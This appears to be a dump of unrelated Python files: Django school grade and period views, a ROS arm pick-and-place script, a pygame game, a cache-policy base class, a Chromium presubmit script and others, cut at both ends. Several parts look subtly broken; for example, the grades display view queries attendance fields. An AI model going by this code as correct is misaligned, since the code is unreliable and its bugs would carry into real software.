        # Expose the colegio id kept in the session, when present.
        colegio_id = get_current_request().session.get('colegio')
        if colegio_id:
            context['idcolegio'] = colegio_id
        return context
class PeriodoAcademicoDetailView(UpdateView):
    """Show/edit one PeriodoAcademico; restricted to administrative roles."""
    model = PeriodoAcademico
    form_class = PeriodoAcademicoForm
    template_name = 'periodo_detail.html'

    def get(self, request, *args, **kwargs):
        if not validar_roles(roles=['promotor', 'director', 'administrativo']):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        return super(PeriodoAcademicoDetailView, self).get(request, *args, **kwargs)
class PeriodoAcademicoCreationView(CreateView):
    """Create a PeriodoAcademico bound to the current colegio."""
    model = PeriodoAcademico
    form_class = PeriodoAcademicoForm
    success_url = reverse_lazy('academic:periodo_list')
    template_name = 'periodo_form.html'

    def form_valid(self, form):
        # Attach the session's colegio before saving.
        form.instance.colegio = Colegio.objects.get(pk=get_current_colegio())
        return super(PeriodoAcademicoCreationView, self).form_valid(form)

    def get(self, request, *args, **kwargs):
        if not validar_roles(roles=['promotor', 'director', 'administrativo']):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        return super(PeriodoAcademicoCreationView, self).get(request, *args, **kwargs)
class PeriodoAcademicoUpdateView(UpdateView):
    """Edit an existing PeriodoAcademico and return to the period list."""
    model = PeriodoAcademico
    template_name = 'periodo_form.html'
    form_class = PeriodoAcademicoForm
    success_url = reverse_lazy('academic:periodo_list')
#####################################################
##### NOTAS DE ALUMNOS #####
#####################################################
class RegistrarNotasAlumnosView(TemplateView):
    """Two-step grade entry.

    POST with an 'aula' key renders the roster for the chosen aula, periodo
    and curso; POST without it persists one Notas row per submitted
    (id, nota) pair.
    """
    model = Notas
    template_name = 'notas_registrar.html'
    success_url = reverse_lazy('academic:asistencia_registrar_dia')
    # Secondary form rendered next to the aula/periodo/curso selectors.
    form2 = RegistrarNotas2Form

    def RegistrarNotas1Form(self, request):
        # Context helper: periodos, aulas and cursos of the current colegio
        # (promotor/director only).
        roles = ['promotor', 'director']
        if validar_roles(roles=roles):
            # Load the periodos tied to the current colegio
            id_colegio = get_current_colegio()
            periodos_colegio = PeriodoAcademico.objects.filter(colegio=id_colegio).order_by('nombre')
            if periodos_colegio.count() == 0:
                # Placeholder entry shown when nothing is registered yet.
                periodos_colegio = ["No hay periodos registrados"]
            # Load the aulas tied to the current colegio
            # (id_colegio is re-fetched here; same value as above)
            id_colegio = get_current_colegio()
            aulas_colegio = Aula.objects.filter(tipo_servicio__colegio=id_colegio).order_by('nombre')
            if aulas_colegio.count() == 0:
                aulas_colegio = ["No hay aulas registradas"]
            # Collect the cursos attached to any aula of this colegio.
            cursos =[]
            cursos_aula = AulaCurso.objects.filter(curso__colegio=id_colegio)
            for curso_aula in cursos_aula:
                cursos.append(curso_aula.curso)
            return {'aulas_colegio': aulas_colegio, 'periodos_colegio': periodos_colegio, 'cursos_aula': cursos}
        else:
            mensaje_error = "No tienes acceso a esta vista"
            return {'mensaje_error': mensaje_error} # return context

    def get(self, request, *args, **kwargs):
        super(RegistrarNotasAlumnosView, self).get(request, *args, **kwargs)
        contexto = self.RegistrarNotas1Form(request)
        contexto2 ={'form2': self.form2}
        contexto.update(contexto2)
        if 'mensaje_error' in contexto.keys():
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        else:
            return render(request, self.template_name, contexto) # return context

    def post(self, request, *args, **kwargs):
        logger.info("Estoy en el POST")
        logger.info("Los datos de llegada son {0}".format(request.POST))
        if 'aula' in request.POST.keys():
            # Step 1: selectors submitted — show the roster of the chosen aula
            # together with the chosen periodo and curso.
            aula = request.POST["aula"]
            periodo = request.POST["periodo_academico"]
            curso = request.POST["curso"]
            aula_selected = Aula.objects.get(id_aula=aula)
            periodo_selected = PeriodoAcademico.objects.get(id_periodo_academico=periodo)
            curso_selected = Curso.objects.get(id_curso=curso)
            matriculadosaula = AulaMatricula.objects.filter(aula=aula).order_by('matricula__alumno__apellido_pa')
            logger.info("Datos son {0}".format(matriculadosaula))
            alumnos = []
            for matriculado in matriculadosaula:
                alumnos.append(matriculado.matricula.alumno)
            contexto = self.RegistrarNotas1Form(request)
            contexto2 = {'form2': self.form2}
            contexto.update(contexto2)
            contexto['alumnos'] = alumnos
            contexto['aula_selected'] = aula_selected
            contexto['periodo_selected'] = periodo_selected
            contexto['curso_selected'] = curso_selected
            return render(request, template_name=self.template_name, context=contexto)
        else:
            # Step 2: grades submitted — save one Notas row per alumno.
            logger.info("Estoy en el POST")
            logger.info("Los datos de llegada son {0}".format(request.POST))
            data_post = request.POST
            alumnos_id = data_post.getlist('id')
            notas = data_post.getlist('nota')
            curso_id = data_post['curso']
            periodo_id = data_post['periodo']
            colegio_id = get_current_colegio()
            curso = Curso.objects.get(id_curso=curso_id)
            periodo = PeriodoAcademico.objects.get(id_periodo_academico=periodo_id)
            colegio = Colegio.objects.get(id_colegio=colegio_id)
            num = len(alumnos_id)
            for n in range(0, num):
                alumno = Alumno.objects.get(id_alumno=alumnos_id[n])
                nota = Notas(alumno=alumno, curso=curso, periodo_academico=periodo, nota=notas[n], colegio=colegio)
                nota.save()
            return redirect('academic:notas_ver')
class VisualizarNotasView(TemplateView):
    """Display registered grade/attendance records for an aula and month.

    Bug fixes vs. original: ``get`` and ``post`` called
    ``self.VisualizarAsistenciaform`` and ``super(VisualizarAsistenciaView,
    ...)`` — names copy/pasted from the attendance view that do not exist
    here and raised NameError/AttributeError at request time.
    """
    model = Notas
    template_name = "notas_ver.html"

    def VisualizarNotasform(self, request):
        """Build the base context (month names and aulas) or an error dict."""
        roles = ['promotor', 'director']
        if not validar_roles(roles=roles):
            return {'mensaje_error': "No tienes acceso a esta vista"}
        meses_todos = ["Enero", "Febrero", "Marzo", "Abril", "Mayo", "Junio", "Julio", "Agosto",
                       "Setiembre", "Octubre", "Noviembre", "Diciembre"]
        # NOTE(review): the original also built a truncated month list here
        # but never used it (and its range(num_mes + 1) indexing raised
        # IndexError in December); the dead computation was removed without
        # changing the returned context.
        id_colegio = get_current_colegio()
        aulas = Aula.objects.filter(tipo_servicio__colegio=id_colegio).order_by('nombre')
        return {'meses': meses_todos, 'aulas': aulas}

    def get(self, request, *args, **kwargs):
        """Render the filter form, or redirect when access is denied."""
        super(VisualizarNotasView, self).get(request, *args, **kwargs)
        contexto = self.VisualizarNotasform(request)
        if 'mensaje_error' in contexto:
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        return render(request, self.template_name, contexto)

    def post(self, request, *args, **kwargs):
        """Build the month grid of records for the selected aula."""
        mes = request.POST["mes"]
        aula = request.POST["aula"]
        num_mes = obtener_mes(mes)
        logger.info("Estoy en el Post, datos de llegada son {0}".format(request.POST))
        # Days per month. NOTE(review): leap years are not handled.
        meses_dias = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
        num_dias = meses_dias[num_mes - 1]
        asistencias_curso = self.model.objects.filter()
        # Narrow to the current year, then the requested month.
        anio = datetime.date.today().year
        asistencias_curso_anio = asistencias_curso.filter(fecha__year=anio)
        asistencias_curso_mes = asistencias_curso_anio.filter(fecha__month=num_mes)
        logger.info("La lista de asistencias de mes son {0}".format(asistencias_curso_mes))
        matriculados_aula = AulaMatricula.objects.filter(aula=aula).order_by('matricula__alumno__apellido_pa')
        alumnos = [matriculado.matricula.alumno for matriculado in matriculados_aula]
        logger.info("El número de alumnos matriculados en esta aula es {0}".format(len(alumnos)))
        fechas = []
        lista_asistencias_dia = []
        for dia in range(0, num_dias):
            asistencias_curso_dia = asistencias_curso_mes.filter(fecha__day=dia + 1)
            logger.info(
                "La lista de asistencias del día {0} mes son {1}".format(dia + 1, asistencias_curso_dia))
            # Record the day's date once (first row) and collect every state.
            for n, asistencias_dias in enumerate(asistencias_curso_dia):
                lista_asistencias_dia.append(asistencias_dias.estado_asistencia)
                if n == 0:
                    fechas.append(asistencias_dias.fecha)
        aula_selected = Aula.objects.get(id_aula=aula)
        logger.info("La lista de asistencias de mes son {0}".format(lista_asistencias_dia))
        logger.info("La lista de fechas de mes son {0}".format(fechas))
        contexto = self.VisualizarNotasform(request)
        contexto['asistencias'] = asistencias_curso_mes
        contexto['num_hor'] = len(fechas)
        contexto['num_ver'] = len(alumnos)
        contexto['fechas'] = fechas
        contexto['alumnos'] = alumnos
        contexto['mes_selected'] = mes
        contexto['aula_selected'] = aula_selected
        return render(request, template_name=self.template_name, context=contexto)
#################################################
##### HORARIOS DE CURSOS #####
#################################################
class HorarioAulaCreateView(CreateView):
    # Create view for course timetables (HorarioAula); standard CreateView
    # wiring, no custom logic is currently active.
    model = HorarioAula
    form_class = HorarioAulaForm
    success_url = reverse_lazy('academic:aula_list')
    template_name = 'horarios_aula.html'
    # The string below is a disabled draft of a role-checked get(); it is a
    # bare string statement, kept verbatim until someone decides its fate.
    """
    def get(self, request, *args, **kwargs):
        roles = ['promotor', 'director', 'administrativo', 'tesorero']
        if validar_roles(roles=roles):
            curso = CursoDocente.objects.filter(curso=request.GET["curso"], activo=True)
            return render(request, template_name=self.template_name, context={
                'form': self.form_class,
                'curso': curso,
            })
        else:
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
    """
def get_cursos(request):
    """AJAX endpoint: return the cursos attached to an aula as JSON.

    Expects ``id_aula`` in the query string; each element carries the
    curso's ``id`` and its ``nombre`` as ``value``. Non-AJAX requests get
    the literal body 'fail'.
    """
    if request.is_ajax():
        id_aula = request.GET.get("id_aula", " ")
        aula_cursos = AulaCurso.objects.filter(aula__id_aula=int(id_aula))
        results = [{'id': aula_curso.curso.id_curso, 'value': aula_curso.curso.nombre}
                   for aula_curso in aula_cursos]
        data = json.dumps(results)
    else:
        data = 'fail'
    # Pass the MIME type by keyword; the positional form relied on an old
    # HttpResponse signature.
    return HttpResponse(data, content_type='application/json')
#########################################
###### RECORDATORIOS TAREAS Y PCS #######
#########################################
class RecordatorioAulaCreateView(CreateView):
    """Create reminders (homework / exam notices) attached to an aula."""
    model = RecordatorioAula
    success_url = reverse_lazy('academic:aula_list')
    template_name = 'recordatorio_aula_form.html'
    form_class = RecordatorioAulaForm

    def get(self, request, *args, **kwargs):
        # Only staff roles may open the creation form.
        allowed = ['promotor', 'director', 'administrativo', 'tesorero']
        if not validar_roles(roles=allowed):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        aula_actual = Aula.objects.get(id_aula=request.GET['aula'])
        contexto = {'aula': aula_actual, 'form': self.form_class}
        return render(request, template_name=self.template_name, context=contexto)

    def post(self, request, *args, **kwargs):
        # Build the reminder straight from the POSTed fields and save it.
        datos = request.POST
        recordatorio = RecordatorioAula(
            aula=Aula.objects.get(id_aula=datos['aula']),
            fecha_programacion=datos['fecha_programacion'],
            nombre=datos['nombre'],
            estado=1,  # 1 == "event created"
            descripcion=datos['descripcion'],
        )
        recordatorio.save()
        return HttpResponseRedirect(reverse('academic:aula_list'))
| 40,565 | 12,678 |
from abc import ABCMeta, abstractmethod
import collections
class ReplaceAlgo(metaclass=ABCMeta):
    """Abstract base class for cache-replacement policies.

    Tracks hit/total counters for both request counts (hc/tc) and byte
    counts (bhc/tbc), plus disk-write and backend-transfer statistics.
    """

    def __init__(self, capacity):
        self.cache_capacity = capacity  # maximum cache size
        self.cache_size = 0             # currently used size
        self.cache_stack = collections.OrderedDict()  # cached entries, insertion-ordered
        self.write2disk = 0             # number of writes to disk
        self.transportfrombackend = 0   # amount fetched from the backend
        self.hc = 0                     # hit count
        self.tc = 0                     # total request count
        self.bhc = 0                    # byte hit count
        self.tbc = 0                    # total byte count
        self.trigger = False            # when True, start counting hr/bhr/...

    @abstractmethod
    def query(self, s):
        """Look up *s* in the cache (policy-specific)."""

    def set_trigger(self):
        """Enable statistics collection."""
        self.trigger = True

    def output(self):
        """Format statistics as 'hr\\t\\tbhr\\t\\twrite2disk\\t\\ttransportfrombackend'."""
        hit_rate = str(float('{0:.6f}'.format(1.0 * self.hc / self.tc)))
        byte_hit_rate = str(float('{0:.6f}'.format(1.0 * self.bhc / self.tbc)))
        return '\t\t'.join([hit_rate, byte_hit_rate,
                            str(self.write2disk), str(self.transportfrombackend)])

    @abstractmethod
    def my_release(self):
        """Release any resources held by the policy (policy-specific)."""
class Node():
    """Per-entry metadata for one cached image."""

    def __init__(self, size):
        # Image size.
        self.size = size
        # Origin flag: 0 when the node comes from a cache miss, nonzero
        # when the prefetcher generated it.
        self.source_flag = 0
        # Number of requests during this node's lifetime in the cache.
        self.stat_count = 1
| 1,273 | 411 |
#!/usr/bin/env python
import sys
import rospy
from math import pi
import moveit_commander
from moveit_msgs.msg import DisplayTrajectory
from apriltag_ros.msg import AprilTagDetectionArray
# CONSTANTS
N_ROBOT_JOINTS = 6        # number of arm joints (gripper excluded)
POSE_TOLERANCE = 0.05     # MoveIt goal position tolerance
FRAMES_LIMIT = 25         # consecutive frames required to confirm the tag
ROTATION_DEGREE = -10     # J1 search rotation step, in degrees
J1_LIMIT_DEGREE = -90     # J1 software limit for the search sweep, in degrees
class openManipulatorPRO:
    """MoveIt commander for the OpenManipulator-PRO arm.

    Sweeps joint 1 in steps until an AprilTag (id 1) is seen in
    FRAMES_LIMIT consecutive camera frames, then runs a pick-and-place
    routine on saved poses.

    Fixes vs. original: integer comparisons used ``is``/``is not``
    (identity, implementation-dependent and a SyntaxWarning on 3.8+);
    the tag callback reset a never-read ``seq_counts`` attribute instead
    of ``frames_count``; and ``search_tag`` converted radians to degrees
    with ``* pi / 180`` (the inverse of the correct factor).
    """

    def __init__(self):
        # ROS NODE INIT
        rospy.init_node('OMP_gripper_moveit_commander')
        # TAG DETECTION - VARS
        self.tag_found = 0      # set to 1 once the tag is confirmed
        self.init_pose = 0      # 1 after the arm reached the search pose
        self.frames_count = 0   # consecutive frames containing the tag
        # MOVEIT INIT
        moveit_commander.roscpp_initialize(sys.argv)
        self.robot = moveit_commander.RobotCommander()
        self.scene = moveit_commander.PlanningSceneInterface()
        self.group = moveit_commander.MoveGroupCommander("arm")
        self.display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path', DisplayTrajectory, queue_size=20)
        # TAG DETECTION INIT
        self.tag_id_subscriber = rospy.Subscriber('/tag_detections', AprilTagDetectionArray, self.tagCB)
        # MOVEIT RESTRICTIONS
        self.group.set_goal_position_tolerance(POSE_TOLERANCE)  # goal tolerance
        self.group.set_planning_time(5)                         # seconds allowed for planning

    # FUNCTION - CALLBACK
    def tagCB(self, data):
        """Detection callback: count consecutive frames that see tag id 1."""
        if (self.tag_found != 1) and (len(data.detections) != 0):
            if data.detections[0].id[0] == 1 and self.init_pose == 1:
                self.frames_count += 1
            else:
                # Restart the streak when the wrong tag is seen (the
                # original reset an unused 'seq_counts' attribute here).
                self.frames_count = 0
            if self.frames_count == FRAMES_LIMIT and self.init_pose == 1:
                self.tag_found = 1

    # FUNCTION - GO TO SPECIFIC POSE
    def go_to_pose(self, pose_name):
        """Plan and execute a motion to a pose saved in the Setup Assistant."""
        # 1 - PASS YOUR POSE SAVED ON SETUP ASSISTANT
        self.group.set_named_target(pose_name)
        # 2 - PLAN AND EXECUTE
        self.group.go(wait=True)
        # 3 - PREVENT RESIDUAL MOVEMENT
        self.group.stop()
        # 4 - CLEAR TARGET GOAL
        self.group.clear_pose_targets()

    def search_tag(self):
        """Rotate J1 by one search step, exiting at the software limit."""
        jointTarget = self.group.get_current_joint_values()
        # Joint values are radians; convert to degrees (* 180 / pi) before
        # comparing against the degree limits. The original multiplied by
        # pi/180, i.e. converted in the wrong direction.
        if (jointTarget[0] * 180 / pi) + ROTATION_DEGREE <= J1_LIMIT_DEGREE:
            rospy.loginfo('J1 Limit Exit!')
            sys.exit()
        # SEARCH TAG
        else:
            jointTarget[0] = jointTarget[0] + (ROTATION_DEGREE * pi / 180)
            self.group.go(joints=jointTarget, wait=True)
            self.group.stop()
            self.group.clear_pose_targets()

    # FUNCTION - SET SPECIFIC JOINT
    def set_joint_go(self, jointIndex, joint_angle_rad):
        """Move a single joint (1-based index) to joint_angle_rad."""
        jointIndex = jointIndex - 1  # translate to 0-based index
        joint_goal = self.group.get_current_joint_values()
        joint_goal[jointIndex] = joint_angle_rad
        self.group.go(joints=joint_goal, wait=True)
        self.group.stop()
        self.group.clear_pose_targets()

    # FUNCTION - PROCESS ROUTINE
    def detect_catch_routine(self):
        """Full routine: home, search for the tag, then pick and place."""
        ## STEP 1 - OPEN GRIPPER
        self.go_to_pose('pHome')
        ## STEP 2 - GO TO SEARCH ZONE
        self.go_to_pose('pSearch')
        ## 2.1 - INIT FLAGS
        self.init_pose = 1
        self.tag_found = 0
        # STEP 3 - SEARCH THE TAG
        while not rospy.is_shutdown():
            # 3.1 - IF TAG WAS NOT FOUND, ROTATE
            if self.tag_found == 0:
                self.search_tag()
                rospy.loginfo('############# ROTATION COMPLETE')
            # 3.2 - IF TAG WAS FOUND, GO TO TARGET POSITION
            elif self.tag_found == 1:
                rospy.loginfo('############# TAG FOUND')
                # GO TO CATCH POSITION
                self.go_to_pose('pCatch')
                # GO TO CATCH POSITION BOTTLE
                self.go_to_pose('pCatchBottle')
                # CATCH WITH GRIPPER
                self.set_joint_go(7, 1.0)
                # GET UP THE BOTTLE
                self.set_joint_go(5, -0.95)
                # GO TO SEARCH INIT
                self.go_to_pose('pSearch')
                # OPEN THE GRIPPER
                self.set_joint_go(7, 2.0)
                # FINISH PROGRAM
                sys.exit()

    # AUXILIAR FUNCTION FOR SEVERAL TESTS
    def test_routine(self):
        """Ad-hoc manual test: catch pose, close gripper, lift."""
        #self.go_to_pose('pHome')
        #self.go_to_pose('pSearch')
        #self.go_to_pose('pCatch')
        self.go_to_pose('pCatchBottle')
        self.set_joint_go(7, 1.0)
        self.set_joint_go(5, -0.95)
if __name__ == '__main__':
    try:
        # INITIALIZE YOUR OBJECT
        omanip = openManipulatorPRO()
        # INITIALIZE THE OPERATION BY CLICKING ENTER
        # NOTE(review): raw_input is Python 2 only — this script targets a
        # Python 2 ROS distribution; use input() under Python 3.
        raw_input("Press Enter to start!")
        # OPERATION
        omanip.detect_catch_routine()
    except rospy.ROSInterruptException:
        pass
    except KeyboardInterrupt:
        pass
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
import os
import unittest
import avb
import avb.utils
# Path to the sample .avb fixture shipped next to this test module.
test_file_01 = os.path.join(os.path.dirname(__file__), 'test_files', 'test_file_01.avb')
class TestRead(unittest.TestCase):
    """Smoke tests: the sample bin file parses without raising."""

    def test_basic(self):
        # Iterating the mobs forces them to be decoded.
        with avb.open(test_file_01) as f:
            for item in f.content.mobs:
                pass
                # print(item)

    def test_read_all_known_classes(self):
        # Decode every chunk whose class id the library knows about.
        # NOTE(review): 'AVBClaseID_dict' looks misspelled but must match
        # the attribute actually exported by avb.utils — do not "fix" here.
        with avb.open(test_file_01) as f:
            for i, chunk in enumerate(f.chunks()):
                if chunk.class_id in avb.utils.AVBClaseID_dict:
                    item = f.read_object(i)
                    # print(item)
if __name__ == "__main__":
    # Allow running this test module directly.
    unittest.main()
| 780 | 270 |
import sys, pygame
from pygame.locals import *
import time
import pygame.freetype
pygame.init()
size = width, height = 800, 600
ball_speed = [3, 7]  # per-frame x/y velocity of the ball
black = 0, 0, 0
rod_speed = [5,0]  # per-frame x velocity of the rod (y never changes)
score = 1
green = (0, 255, 0)
blue = (0, 0, 128)
white = (255, 255, 255)
screen = pygame.display.set_mode(size)
#ball loading and shortning its image size
ball_img = pygame.image.load("image.jpeg")
ball = pygame.transform.scale(ball_img,(80,50))
ballrect = ball.get_rect()
#setting the caption for game
pygame.display.set_caption("Rod and Ball Game")
#rod loading and shortning its image size
rod_img = pygame.image.load("rod.png")
rod = pygame.transform.scale(rod_img,(100,20))
rodrect = rod.get_rect()
font = pygame.font.Font('freesansbold.ttf', 32)
# Main loop: move ball and rod, bounce off walls, end when the ball
# reaches the top edge.
while 1:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            pygame.quit()
            sys.exit()
        #image collision function added
        # NOTE(review): collision/game-over are tested once per queued
        # event, so the score grows with the number of events while the
        # ball overlaps the rod — confirm whether this is intended.
        if ballrect.colliderect(rodrect):
            score +=1
            #print(score)
        elif ballrect.top < 0:
            # Game over: show the final score for 2 s, then exit.
            print(score)
            screen.fill(white)
            text = font.render('Your Score ' + str(score), True, green, blue)
            textRect = text.get_rect()
            textRect.center = (width // 2, height // 2)
            screen.blit(text, textRect)
            pygame.display.update()
            pygame.quit()
            pygame.time.delay(2000)
            quit()
    #ball code
    ballrect = ballrect.move(ball_speed)
    if ballrect.left < 0 or ballrect.right > width:
        ball_speed[0] = -ball_speed[0]
    if ballrect.top < 0 or ballrect.bottom > height:
        ball_speed[1] = -ball_speed[1]
    #rod code
    # NOTE(review): 'event' here is whatever the last loop iteration left
    # behind (NameError on the first frame if the queue was empty) —
    # confirm this key handling is intended.
    if event.type == pygame.KEYDOWN:
        if event.key == pygame.K_RIGHT:
            if rod_speed[0] > 0:
                rod_speed[0] = -rod_speed[0]
        elif event.key == pygame.K_LEFT:
            if rod_speed[0] < 0:
                rod_speed[0] = -rod_speed[0]
    rodrect = rodrect.move(rod_speed)
    if rodrect.left < 0 or rodrect.right > width:
        rod_speed[0] = -rod_speed[0]
    #screen pixels and setting adjustment
    screen.fill(black)
    screen.blit(ball, ballrect)
    screen.blit(rod, rodrect)
    #turning full image upside down
    screen.blit(pygame.transform.rotate(screen, 180), (0, 0))
    pygame.display.flip()
| 2,278 | 835 |
import pyclipper
from shapely.geometry import Polygon
from typing import List
from oasis.util import clean_polygon, convert_to_clipper, convert_from_clipper
class ClipperOffsetting():
    """Compute inward offset contours of a polygon using pyclipper."""

    def __init__(self, poly : Polygon, clipper_scale : int = 1000) -> None:
        # Clean the polygon first, then register it with the offsetter in
        # scaled integer clipper coordinates.
        self.poly = clean_polygon(poly)
        self.offsetter = pyclipper.PyclipperOffset()
        self.clipper_scale = clipper_scale
        scaled_path = convert_to_clipper(self.poly, self.clipper_scale)
        self.offsetter.AddPaths(scaled_path, pyclipper.JT_ROUND, pyclipper.ET_CLOSEDPOLYGON)

    def get_offset(self, dist : float, n_contour: int = 1) -> List[Polygon]:
        """Return n_contour polygons, the i-th offset inward by i * dist."""
        offsets = []
        for contour_index in range(n_contour):
            executed = self.offsetter.Execute(-1 * dist * contour_index * self.clipper_scale)
            offsets.append(convert_from_clipper(executed, self.clipper_scale))
        return offsets
from __future__ import absolute_import
from social_auth.middleware import SocialAuthExceptionMiddleware
from sentry.utils import auth
from sentry.utils.http import absolute_uri
class SentrySocialAuthExceptionMiddleware(SocialAuthExceptionMiddleware):
    # On a social-auth error, send the user to Sentry's login page (as an
    # absolute URL) instead of social_auth's default redirect target.
    def get_redirect_uri(self, request, exception):
        return absolute_uri(auth.get_login_url())
| 357 | 97 |
# Generated by Django 2.1.3 on 2018-11-27 09:55
import attrs.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration: adds the Visit model (name, attrs blob and
    # a FK to app.Protocol). Generated operations should not be hand-edited.

    dependencies = [("app", "0001_initial")]

    operations = [
        migrations.CreateModel(
            name="Visit",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("name", models.CharField(max_length=100)),
                ("attrs", attrs.fields.AttrsField(default=dict, editable=False)),
                (
                    "protocol",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE, to="app.Protocol"
                    ),
                ),
            ],
        )
    ]
| 1,013 | 274 |
# -*-coding:utf-8-*-
"""
程序启动参数定义、获取与解析
@author Myles Yang
"""
import argparse
import const_config as const
""" 设置命令参数时的KEY """
# How the program runs
ARG_KEY_RUN = ARG_RUN = '--run'
# How the program logs
ARG_KEY_LOG = ARG_LOG = '--log'
# Create a program shortcut
ARG_KEY_LNK = ARG_LNK = '--lnk'
# Runtime environment
ARG_KEY_ENV = ARG_ENV = '--env'
# Commands executable while the program is running
ARG_KEY_CMD = ARG_CMD = '--cmd'
""" --run 命令参数选项 """
# Start in the console (foreground)
ARG_RUN_TYPE_CONSOLE = 'console'
# Start in the background
ARG_RUN_TYPE_BACKGROUND = 'background'
# Start on boot, running in the background
ARG_RUN_TYPE_POWERBOOT = 'powerboot'
# Start the web UI
ARG_RUN_TYPE_WEBUI = 'webui'
# Create a shortcut
ARG_RUN_TYPE_LNK = 'lnk'
# Send a command to a running instance
ARG_RUN_TYPE_CMD = 'cmd'
# Allowed choices
CHOICES_ARG_RUN_TYPE = [ARG_RUN_TYPE_CONSOLE, ARG_RUN_TYPE_BACKGROUND, ARG_RUN_TYPE_POWERBOOT,
                        ARG_RUN_TYPE_WEBUI, ARG_RUN_TYPE_LNK, ARG_RUN_TYPE_CMD]
""" --log 命令参数选项 """
# Log to the console
ARG_LOG_TYPE_CONSOLE = 'console'
# Log to a file
ARG_LOG_TYPE_FILE = 'file'
# Log to both a file and the console
ARG_LOG_TYPE_BOTH = 'both'
# Disable logging
ARG_LOG_TYPE_NONE = 'none'
# Allowed choices
CHOICES_ARG_LOG_TYPE = [ARG_LOG_TYPE_CONSOLE, ARG_LOG_TYPE_FILE, ARG_LOG_TYPE_BOTH, ARG_LOG_TYPE_NONE]
""" --env 命令参数选项 """
# Production environment
ARG_ENV_TYPE_PROD = 'prod'
# Development environment
ARG_ENV_TYPE_DEV = 'dev'
# Allowed choices
CHOICES_ARG_ENV_TYPE = [ARG_ENV_TYPE_PROD, ARG_ENV_TYPE_DEV]
""" --cmd 命令参数选项 """
# Next wallpaper
ARG_CMD_TYPE_NXT = 'nxt'
# Previous wallpaper
ARG_CMD_TYPE_PRE = 'pre'
# Favourite the current wallpaper
ARG_CMD_TYPE_FAV = 'fav'
# Locate the current wallpaper file
ARG_CMD_TYPE_LOC = 'loc'
# Allowed choices
CHOICES_ARG_CMD_TYPE = [ARG_CMD_TYPE_NXT, ARG_CMD_TYPE_PRE, ARG_CMD_TYPE_FAV, ARG_CMD_TYPE_LOC]
"""
定义命令行输入参数
"""
# Command-line parser; help texts stay in Chinese because they are
# user-facing runtime strings.
parser = argparse.ArgumentParser(
    prog=const.app_name,
    description='{}命令行参数'.format(const.app_name),
)
parser.add_argument('-r', ARG_RUN,
                    help='指定程序的运行方式',
                    type=str,
                    choices=CHOICES_ARG_RUN_TYPE,
                    dest=ARG_KEY_RUN
                    )
parser.add_argument('-l', ARG_LOG,
                    help='指定运行日志记录方式',
                    type=str,
                    choices=CHOICES_ARG_LOG_TYPE,
                    dest=ARG_KEY_LOG
                    )
parser.add_argument('-e', ARG_ENV,
                    help='指定程序的运行环境',
                    type=str,
                    choices=CHOICES_ARG_ENV_TYPE,
                    dest=ARG_KEY_ENV,
                    default=ARG_ENV_TYPE_PROD
                    )
parser.add_argument('-s', ARG_LNK,
                    help='根据给的路径创建程序的快捷方式,与--run组合使用',
                    type=str,
                    nargs='*',
                    dest=ARG_KEY_LNK
                    )
parser.add_argument('-c', ARG_CMD,
                    help='运行中可执行指令,与--run组合使用',
                    type=str,
                    choices=CHOICES_ARG_CMD_TYPE,
                    dest=ARG_KEY_CMD
                    )
# Parsed CLI arguments as a plain dict, keyed by the dest names above.
arg_dict = vars(parser.parse_args())
| 2,798 | 1,489 |
from puzzle.constraints import constraints, validator
from puzzle.puzzlepedia import annotation_widget
from spec.mamba import *
# Patch the ipywidgets module used by annotation_widget so no real
# widgets are constructed during the spec.
widget_patch = mock.patch('puzzle.puzzlepedia.annotation_widget.widgets')
class TestConstraints(constraints.Constraints):
  # Minimal Constraints subclass exposing a single annotated field.
  test: str = 'value'
# mamba-style spec: description/before/after/it blocks form the test
# structure; they are not ordinary context managers.
with description('annotation_widget'):
  with before.each:
    self.mock_widgets = widget_patch.start()
  with after.each:
    widget_patch.stop()
  with it('renders NumberInRange as a FloatSlider'):
    annotation_widget.AnnotationWidget(
        validator.NumberInRange(0.0, 2.0), TestConstraints(), 'test', 1.0,
        None,
        mock.Mock())
    expect(self.mock_widgets.FloatSlider).to(have_been_called)
| 693 | 221 |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
# Path regexes to skip in the canned project-wide checks.
_EXCLUDED_PATHS = []
# Regex (one alternative per source line) matching the Chromium BSD
# license header that every checked file must carry.
_LICENSE_HEADER = (
    r".*? Copyright \(c\) 20\d\d The Chromium Authors\. All rights reserved\."
    "\n"
    r".*? Use of this source code is governed by a BSD-style license that can "
    "be\n"
    r".*? found in the LICENSE file\."
    "\n"
)
def _CommonChecksImpl(input_api, output_api):
  """Run all shared presubmit checks and return the collected results."""
  results = []
  # Project-wide canned checks (formatting, banned patterns, etc.).
  results += input_api.canned_checks.PanProjectChecks(
      input_api, output_api, excluded_paths=_EXCLUDED_PATHS)
  # Imported lazily: sys.path is only prepared by _CommonChecks().
  from trace_viewer import build
  from tvcm import presubmit_checker
  checker = presubmit_checker.PresubmitChecker(input_api, output_api)
  results += checker.RunChecks()
  from trace_viewer.build import check_gyp
  gyp_result = check_gyp.GypCheck()
  if len(gyp_result) > 0:
    results += [output_api.PresubmitError(gyp_result)]
  from trace_viewer.build import check_gn
  gn_result = check_gn.GnCheck()
  if len(gn_result) > 0:
    results += [output_api.PresubmitError(gn_result)]
  # License-header check over all non-blacklisted source files.
  black_list = input_api.DEFAULT_BLACK_LIST
  sources = lambda x: input_api.FilterSourceFile(x, black_list=black_list)
  results += input_api.canned_checks.CheckLicense(
      input_api, output_api, _LICENSE_HEADER,
      source_file_filter=sources)
  return results
def _CommonChecks(input_api, output_api):
  """Run the shared checks with the repo root temporarily on sys.path."""
  repo_root = input_api.change.RepositoryRoot()
